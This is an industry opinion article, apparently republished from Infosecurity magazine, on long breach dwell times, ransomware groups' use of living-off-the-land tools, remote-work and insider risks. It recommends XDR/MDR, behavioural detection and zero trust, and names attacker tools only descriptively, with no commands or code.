The Cyber Security Industry has a Problem – an Epidemic of Hidden Breaches
The cyber security industry has a problem. Global spending continues to rise, yet this rise in spending doesn’t correlate with a decrease in breaches. Back in 2015 it took on average 206 days to identify a breach, and many more to contain it. Fast forward five years and the situation had greatly improved, with the global median dwell time dropping below one month (24 days) for the first time in 2020 (although the report also noted that “…it is also likely the preponderance of ransomware that helped drive down the time between initial infection and identification”).
However, 24 days is still plenty of time for threat actors to achieve their objectives. We need to get faster at catching them and evicting them, reducing their dwell time such that it can be measured in hours or minutes, not days.
In order to do that, there needs to be increased focus on the common sources of hidden malicious behaviour inside organisations. Let’s explore that and some best practices to mitigate the risk.
In the Firing Line
Commodity, automated attacks are still hugely prevalent. One vendor blocked nearly 63 billion threats last year, for example. But many cyber crime groups have realised that it pays to invest more in sophisticated tooling and targeted threats. A great example is the recent proliferation of ransomware groups like Ryuk and REvil. They increasingly use ‘living off the land’ binaries (LOLBins) — abusing legitimate Windows tools and processes to fly under the radar of anti-malware tools. Lateral movement is often performed with WMI and RDP, network reconnaissance with nltest.exe and net.exe, retrieval of additional tools such as modified versions of Mimikatz and Cobalt Strike using Powershell, and deploying ransomware payloads with the BITS service.
To gain that initial foothold, threat actors have another secret weapon — mass remote working. The pandemic has disrupted security efforts while creating new gaps in protection that they’ve been quick to exploit. These include distracted home workers who may click on links before thinking, or remote workers sharing devices and networks with those who engage in risky behaviour (flatmates, children etc.).
The use of remote working infrastructure (e.g. VPNs) and team collaboration apps containing vulnerabilities, as well as the use of remote working tools (e.g. virtual desktop infrastructure) and accounts without strong password protection, create additional operational challenges for security teams.
Let’s also not forget that the threat isn’t only from malicious outsiders. Thanks to the financial pressures of the pandemic, and the challenges employers have monitoring remote workers, there are many opportunities and incentives for malign insiders. Recent research revealed that such incidents can cost over $4 million per organisation annually and take on average 77 days to contain. One lottery worker in Italy tricked his employer out of €24 million ($29m) over a period of several years.
Inefficient offboarding processes, poor password management, and overprivileged identities all compound the risks associated with both internal and external threats.
A Three-pronged Strategy
Visibility, context, and control is the name-of-the-game for IT security teams. But it can be a challenge even understanding the size of the organisation’s existing endpoint and cloud environment, let alone securing it. Several best practice approaches are worth considering here:
1. An XDR/MDR approach
Address threat detection and response across different parts of the IT estate in a siloed manner and you’re likely to miss something. We need to stitch together events across cloud, network, and endpoint layers for comprehensive insight — an approach known as Extended Detection and Response (XDR). Managed Detection and Response (MDR) is particularly useful as it effectively outsources all, or part of, your security operations function to an expert third party. Using tools including XDR, they can support 24/7 threat detection and containment, freeing up time and focus for your in-house security team to get more strategic.
2. Behavioural analysis
This is no time for relying solely on signatures and static rule-based approaches alone. Your tooling must evolve to adapt to the use of LOLBins and other covert techniques such as lateral movement with stolen credentials. Behavioural detection uses machine learning to baseline normal behaviour across both managed and unmanaged devices. The idea is that, once trained, it will be able to spot suspicious activity more easily. Enhanced with local business context, such as who are your VIP users and which are your critical devices, it can offer a much-enhanced method of threat detection whilst improving the effectiveness of incident response efforts.
3. Zero Trust
Another best practice many organisations are increasingly adopting is zero trust — an approach which boils down to “never trust, always verify.” It’s formulated around the idea that you must remove inherent trust from the network, treat it as hostile and instead gain confidence that you can trust a connection. Foundational capabilities include risk-based multi-factor authentication (MFA), device profiling, network segmentation, protective monitoring and more.
This is, of course, not an exhaustive plan, but rather one to help you start thinking about what’s required to mitigate cyber risk in a fast-changing world. The threat landscape is a volatile thing, supported by an underground economy with an annual income measured in trillions today. We need to get smarter about finding and stopping these threat actors — evicting them from our networks quickly. Or we risk inevitable financial and reputational damage.
This article originally appeared on Infosecurity magazine and can be found here.